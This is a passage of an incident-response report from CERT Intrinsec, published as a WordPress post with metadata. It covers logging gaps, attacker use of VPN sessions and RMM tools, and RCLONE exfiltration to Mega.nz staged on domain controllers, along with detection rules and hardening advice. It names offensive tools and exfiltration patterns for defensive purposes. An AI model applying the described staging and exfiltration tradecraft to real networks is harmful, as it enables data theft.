monitored<\/strong>:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Windows Event Logs<\/strong> were configured with default settings, missing critical event categories<\/li>\n\n\n\n<li><strong>No centralized log collection<\/strong> (SIEM) was in place, or retention was insufficient<\/li>\n\n\n\n<li><strong>Security teams lacked detection rules<\/strong> for known offensive tooling<\/li>\n\n\n\n<li><strong>Administrative activity was not baselined<\/strong>, making anomalies invisible<\/li>\n<\/ul>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>This observation is consistent across our commitments: <strong>the gap is not just technical capability, but operational maturity in logging and monitoring<\/strong>.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-defensive-implications-0\">Defensive implications<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The following recommendations focus on closing the logging and detection gap:<\/p>\n\n\n\n<p><strong>Logging policy \u2014 foundational requirements:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>New service creation (7045).<\/strong> Detects smbexec, PsExec, Impacket<\/li>\n\n\n\n<li><strong>Scheduled task creation (4698)<\/strong>. Detects atexec<\/li>\n\n\n\n<li><strong>Process creation with command line (4688)<\/strong>. Visibility into executed commands<\/li>\n\n\n\n<li><strong>PowerShell script block logging (4104)<\/strong>. PowerShell captures payloads<\/li>\n\n\n\n<li><strong>Logon events (4624, 4625)<\/strong> \u2013 Authentication<\/li>\n\n\n\n<li><strong>Administrative share access (5140, 5145)<\/strong> Detects ADMIN$ and C$ access<\/li>\n<\/ul>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Without these events, detection of post-exploitation activity is <strong>effectively blind<\/strong>.<\/p>\n\n\n\n<p><strong>Centralized collection and retention:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Forward logs to a SIEM<\/strong> or centralized logging platform<\/li>\n\n\n\n<li><strong>Ensure retention of at least 90 days<\/strong> \u2014 many intrusions are discovered weeks after initial access<\/li>\n\n\n\n<li><strong>Include domain controllers, servers, and workstations<\/strong> in collection scope<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-detection-content\">Content detection<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Deploy detection rules for known offensive tool signatures:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Service names containing Unix timestamps<\/strong> (Impacket indicator)<\/li>\n\n\n\n<li><strong>Randomly named services <\/strong>with cmd.exe or PowerShell execution (smbexec indicator)<\/li>\n\n\n\n<li><strong>Scheduled tasks created via remote RPC<\/strong><\/li>\n\n\n\n<li><strong>Alert on administrative share access<\/strong> from non-administrative systems<\/li>\n\n\n\n<li><strong>Baseline legitimate administrative tooling<\/strong>; alert on deviations<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-operational-readiness\">Operational readiness<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Ensure security teams <strong>can investigate alerts within hours<\/strong>, not days. Conduct <strong>periodic purple team exercises<\/strong> to validate detection coverage. Test whether current logging would detect a NetExec\/Impacket-based attack.<\/p>\n\n\n\n<p>The tools used by attackers <strong>are well-known and leave predictable traces<\/strong>. The question is not whether detection is possible, but whether organizations have invested in the logging and monitoring infrastructure to make it happen.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-command-and-control-through-vpn-exploitation\">Command and Control through VPN exploitation<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-vpn-as-primary-c2-channel\">VPN as primary C2 channel<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>A finding notable across our engagements: when attackers obtained legitimate VPN credentials, they rarely deployed dedicated Command and Control infrastructure. <strong>The compromised VPN session itself served as the primary remote access channel<\/strong> \u2014 providing encrypted, authenticated connectivity that blended seamlessly with legitimate traffic.<br>This observation has significant implications for detection: <strong>traditional C2 hunting<\/strong> focused on beaconing patterns, unusual outbound connections, or known malicious infrastructure <strong>is ineffective when the attacker operates through the organization&#039;s own VPN gateway<\/strong>.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-remote-monitoring-and-management-tools-as-fallback\">Remote Monitoring and Management tools as fallback<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>When attackers required additional remote access mechanisms, they overwhelmingly favored <strong>legitimate Remote Monitoring and Management (RMM) tools<\/strong> over traditional offensive C2 frameworks. The following tools were observed across engagements:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>AnyDesk<\/li>\n\n\n\n<li>Splashtop<\/li>\n\n\n\n<li>ScreenConnect \/ ConnectWise<\/li>\n\n\n\n<li>MeshAgent<\/li>\n\n\n\n<li>Teramind<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-data-exfiltration-methodology\">Data Exfiltration Methodology<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Data exfiltration was observed in incidents involving ransomware double extortion, Initial Access Brokers preparing access packages for resale, and suspected espionage operations.<br><strong>RCLONE<\/strong>, a command-line cloud synchronization tool, <strong>was the dominant exfiltration utility<\/strong>.<br><strong>Mega.nz was the most frequently observed destination<\/strong>, with <strong>SFTP to attacker-controlled infrastructure<\/strong> observed in a smaller number of cases.<br>In the vast majority of incidents, <strong>exfiltration was not detected during the intrusion<\/strong> \u2014 it was identified only during post-incident forensic analysis. This consistent detection failure highlights <strong>fundamental gaps in outbound traffic monitoring<\/strong>.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-exfiltration-staging-pattern\">Exfiltration staging pattern<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>A consistent operational pattern was observed: rather than executing RCLONE directly on systems hosting the targeted data, <strong>attackers staged the tool on domain controllers or administrator workstations<\/strong> \u2014 systems with <strong>broad network visibility and existing access to network shares<\/strong>.<\/p>\n\n\n\n<p>This approach offers several advantages to the attacker: it <strong>minimizes the number of systems<\/strong> on which exfiltration tooling is deployed and <strong>leverages existing network share access<\/strong> from privileged systems. Additionally, we assess that attackers deliberately select domain controllers and administrator workstations because these systems <strong>frequently benefit from less restrictive network policies<\/strong> \u2014 proxy exclusions, direct internet access, or relaxed firewall rules \u2014 originally configured to accommodate administrative operations. This misconfiguration provides attackers with an <strong>unfiltered egress path that would not be available from standard user endpoints<\/strong>.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-defensive-implications-1\">Defensive implications<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Restrict outbound internet access from Tier 0 systems<\/strong>. Domain controllers should not have direct internet access under any circumstances. Enforcing this through firewall policy would neutralize the most common exfiltration pattern observed. This single control addresses the root cause.<\/li>\n\n\n\n<li><strong>Block or monitor known exfiltration destinations<\/strong>. If not business-justified, block access to Mega.nz and similar cloud storage providers at the proxy or firewall level. Where blocking is not feasible, alert on any connection from server infrastructure to these services.<\/li>\n\n\n\n<li><strong>Detect RCLONE execution<\/strong>. Alert on RCLONE binary presence or execution \u2014 particularly on domain controllers and administrative workstations, where this tool has no legitimate purpose. Monitor for known RCLONE command-line patterns (sync, copy, \u2013transfers, \u2013config).<\/li>\n\n\n\n<li><strong>Monitor anomalous outbound volume<\/strong>. Implement netflow analysis or proxy-based monitoring for unusual outbound data volume, especially from privileged systems. Exfiltration of significant datasets produces detectable traffic anomalies \u2014 provided someone is looking.<\/li>\n\n\n\n<li><strong>Monitor network share access patterns<\/strong>. Domain controllers or administrative workstations performing bulk read operations across multiple file shares is consistent with exfiltration staging and should trigger investigation.<\/li>\n\n\n\n<li><strong>Treat exfiltration detection as a priority investment<\/strong>. The consistent failure to detect exfiltration in progress represents a missed opportunity to contain incidents before the most damaging phase \u2014 data exposure. Organizations that invest in outbound monitoring gain a critical last line of defense.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-conclusion\">Conclusion<\/h2>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Observations made by CERT Intrinsec in 2025 show that threat actors are constantly evolving in order to bypass defenses put in place by organizations, who have a growing understanding of threat actors and their operating methods.<\/p>\n\n\n\n<p>This can be seen in the increase of cloud-targeted attacks, often using methods able to bypass traditional defenses such as Multi-Factor Authentication.<\/p>\n\n\n\n<p>The start of 2026 shows a continuity in this logic, with a resurgence of attacks involving AWS (Amazon Web Services) environments, such as compromises of EC2 instances or complete AWS tenants.<\/p>\n\n\n\n<p><\/p>","protected":false},"excerpt":{"rendered":"<p>CERT Intrinsec is a French Incident Response team providing incident response and crisis management services to organizations across multiple sectors. Certified PRIS (Security Incident Response Service Provider) by ANSSI since 2022, the team has been operating since 2013 and has handled hundreds of engagements, gaining firsthand insight into the evolution of threat actor tradecraft.<\/p>\n<p>In 2025, CERT Intrinsec was engaged in approximately sixty significant incidents involving ransomware operators, Initial Access Brokers (IABs), insider threats, and suspected state-sponsored actors conducting intelligence operations. These incidents spanned a wide range of environments, from legacy on-premise infrastructure to cloud-native Microsoft 365 tenants.<\/p>\n<p>This report synthesizes our observations from these engagements with a focus on actionable findings. Rather than presenting descriptive statistics alone, we examine intrusion mechanisms, attacker dwell time, targeted assets, and defensive gaps \u2014 with the explicit goal of informing detection strategies and hardening priorities for security practitioners.<\/p>","protected":false},"author":54,"featured_media":231445,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[176],"class_list":["post-231421","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cert","tag-incident-response"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO v27.3) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Rapport sur les incidents cyber et recommandations<\/title>\n<meta name=\"description\" content=\"D\u00e9couvrez notre rapport sur les incidents cyber et nos r\u00e9sultats actionnables pour am\u00e9liorer votre s\u00e9curit\u00e9.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.intrinsec.com\/en\/cert-intrinsec-incidents-report-2025\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CERT Intrinsec Incidents Report 2025\" \/>\n<meta property=\"og:description\" content=\"D\u00e9couvrez notre rapport sur les incidents cyber et nos r\u00e9sultats actionnables pour am\u00e9liorer votre s\u00e9curit\u00e9.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.intrinsec.com\/en\/cert-intrinsec-incidents-report-2025\/\" \/>\n<meta property=\"og:site_name\" content=\"INTRINSEC\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-24T15:09:37+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-03-27T14:43:56+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/guttest192_illustration_of_emergency_procedure_in_cyber_securit_f7e3b5c9-9b90-44ad-837c-fe1012c7225a.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1456\" \/>\n\t<meta property=\"og:image:height\" content=\"816\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Quentin Peyronnet\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Quentin Peyronnet\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"20 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/\"},\"author\":{\"name\":\"Quentin Peyronnet\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/#\\\/schema\\\/person\\\/eb68c362eb25b906b7a3ebb412634a28\"},\"headline\":\"CERT Intrinsec Incidents Report 2025\",\"datePublished\":\"2026-02-24T15:09:37+00:00\",\"dateModified\":\"2026-03-27T14:43:56+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/\"},\"wordCount\":3770,\"image\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.intrinsec.com\\\/wp-content\\\/uploads\\\/2026\\\/02\\\/guttest192_illustration_of_emergency_procedure_in_cyber_securit_f7e3b5c9-9b90-44ad-837c-fe1012c7225a.png\",\"keywords\":[\"Incident Response\"],\"articleSection\":[\"CERT\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/\",\"url\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/\",\"name\":\"Rapport sur les incidents cyber et recommandations\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.intrinsec.com\\\/wp-content\\\/uploads\\\/2026\\\/02\\\/guttest192_illustration_of_emergency_procedure_in_cyber_securit_f7e3b5c9-9b90-44ad-837c-fe1012c7225a.png\",\"datePublished\":\"2026-02-24T15:09:37+00:00\",\"dateModified\":\"2026-03-27T14:43:56+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/#\\\/schema\\\/person\\\/eb68c362eb25b906b7a3ebb412634a28\"},\"description\":\"D\u00e9couvrez notre rapport sur les incidents cyber et nos r\u00e9sultats actionnables pour am\u00e9liorer votre s\u00e9curit\u00e9.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.intrinsec.com\\\/wp-content\\\/uploads\\\/2026\\\/02\\\/guttest192_illustration_of_emergency_procedure_in_cyber_securit_f7e3b5c9-9b90-44ad-837c-fe1012c7225a.png\",\"contentUrl\":\"https:\\\/\\\/www.intrinsec.com\\\/wp-content\\\/uploads\\\/2026\\\/02\\\/guttest192_illustration_of_emergency_procedure_in_cyber_securit_f7e3b5c9-9b90-44ad-837c-fe1012c7225a.png\",\"width\":1456,\"height\":816},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.intrinsec.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"CERT Intrinsec Incidents Report 2025\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/#website\",\"url\":\"https:\\\/\\\/www.intrinsec.com\\\/\",\"name\":\"INTRINSEC\",\"description\":\"Notre m\u00e9tier , Prot\u00e9ger le v\u00f4tre\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.intrinsec.com\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/#\\\/schema\\\/person\\\/eb68c362eb25b906b7a3ebb412634a28\",\"name\":\"Quentin Peyronnet\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f1a18fbb4c9c0cff7626186835c06291da8571ef36fc97838db40c28fde159b8?s=96&d=retro&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f1a18fbb4c9c0cff7626186835c06291da8571ef36fc97838db40c28fde159b8?s=96&d=retro&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f1a18fbb4c9c0cff7626186835c06291da8571ef36fc97838db40c28fde159b8?s=96&d=retro&r=g\",\"caption\":\"Quentin Peyronnet\"},\"url\":\"https:\\\/\\\/www.intrinsec.com\\\/en\\\/author\\\/quentin-peyronnet\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Report on cyber incidents and recommendations","description":"Discover our cyber incident report and our actionable findings to improve your security.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.intrinsec.com\/en\/cert-intrinsec-incidents-report-2025\/","og_locale":"en_US","og_type":"article","og_title":"CERT Intrinsec Incidents Report 2025","og_description":"D\u00e9couvrez notre rapport sur les incidents cyber et nos r\u00e9sultats actionnables pour am\u00e9liorer votre s\u00e9curit\u00e9.","og_url":"https:\/\/www.intrinsec.com\/en\/cert-intrinsec-incidents-report-2025\/","og_site_name":"INTRINSEC","article_published_time":"2026-02-24T15:09:37+00:00","article_modified_time":"2026-03-27T14:43:56+00:00","og_image":[{"width":1456,"height":816,"url":"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/guttest192_illustration_of_emergency_procedure_in_cyber_securit_f7e3b5c9-9b90-44ad-837c-fe1012c7225a.png","type":"image\/png"}],"author":"Quentin Peyronnet","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Quentin Peyronnet","Est. reading time":"20 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/#article","isPartOf":{"@id":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/"},"author":{"name":"Quentin Peyronnet","@id":"https:\/\/www.intrinsec.com\/#\/schema\/person\/eb68c362eb25b906b7a3ebb412634a28"},"headline":"CERT Intrinsec Incidents Report 2025","datePublished":"2026-02-24T15:09:37+00:00","dateModified":"2026-03-27T14:43:56+00:00","mainEntityOfPage":{"@id":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/"},"wordCount":3770,"image":{"@id":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/#primaryimage"},"thumbnailUrl":"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/guttest192_illustration_of_emergency_procedure_in_cyber_securit_f7e3b5c9-9b90-44ad-837c-fe1012c7225a.png","keywords":["Incident Response"],"articleSection":["CERT"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/","url":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/","name":"Report on cyber incidents and recommendations","isPartOf":{"@id":"https:\/\/www.intrinsec.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/#primaryimage"},"image":{"@id":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/#primaryimage"},"thumbnailUrl":"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/guttest192_illustration_of_emergency_procedure_in_cyber_securit_f7e3b5c9-9b90-44ad-837c-fe1012c7225a.png","datePublished":"2026-02-24T15:09:37+00:00","dateModified":"2026-03-27T14:43:56+00:00","author":{"@id":"https:\/\/www.intrinsec.com\/#\/schema\/person\/eb68c362eb25b906b7a3ebb412634a28"},"description":"Discover our cyber incident report and our actionable findings to improve your security.","breadcrumb":{"@id":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/#primaryimage","url":"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/guttest192_illustration_of_emergency_procedure_in_cyber_securit_f7e3b5c9-9b90-44ad-837c-fe1012c7225a.png","contentUrl":"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/guttest192_illustration_of_emergency_procedure_in_cyber_securit_f7e3b5c9-9b90-44ad-837c-fe1012c7225a.png","width":1456,"height":816},{"@type":"BreadcrumbList","@id":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.intrinsec.com\/"},{"@type":"ListItem","position":2,"name":"CERT Intrinsec Incidents Report 2025"}]},{"@type":"WebSite","@id":"https:\/\/www.intrinsec.com\/#website","url":"https:\/\/www.intrinsec.com\/","name":"INTRINSEC","description":"Our job is to protect yours.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.intrinsec.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/www.intrinsec.com\/#\/schema\/person\/eb68c362eb25b906b7a3ebb412634a28","name":"Quentin Peyronnet","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f1a18fbb4c9c0cff7626186835c06291da8571ef36fc97838db40c28fde159b8?s=96&d=retro&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f1a18fbb4c9c0cff7626186835c06291da8571ef36fc97838db40c28fde159b8?s=96&d=retro&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f1a18fbb4c9c0cff7626186835c06291da8571ef36fc97838db40c28fde159b8?s=96&d=retro&r=g","caption":"Quentin Peyronnet"},"url":"https:\/\/www.intrinsec.com\/en\/author\/quentin-peyronnet\/"}]}},"_links":{"self":[{"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/posts\/231421","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/users\/54"}],"replies":[{"embeddable":true,"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/comments?post=231421"}],"version-history":[{"count":16,"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/posts\/231421\/revisions"}],"predecessor-version":[{"id":231654,"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/posts\/231421\/revisions\/231654"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/media\/231445"}],"wp:attachment":[{"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/media?parent=231421"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/categories?post=231421"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/tags?post=231421"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}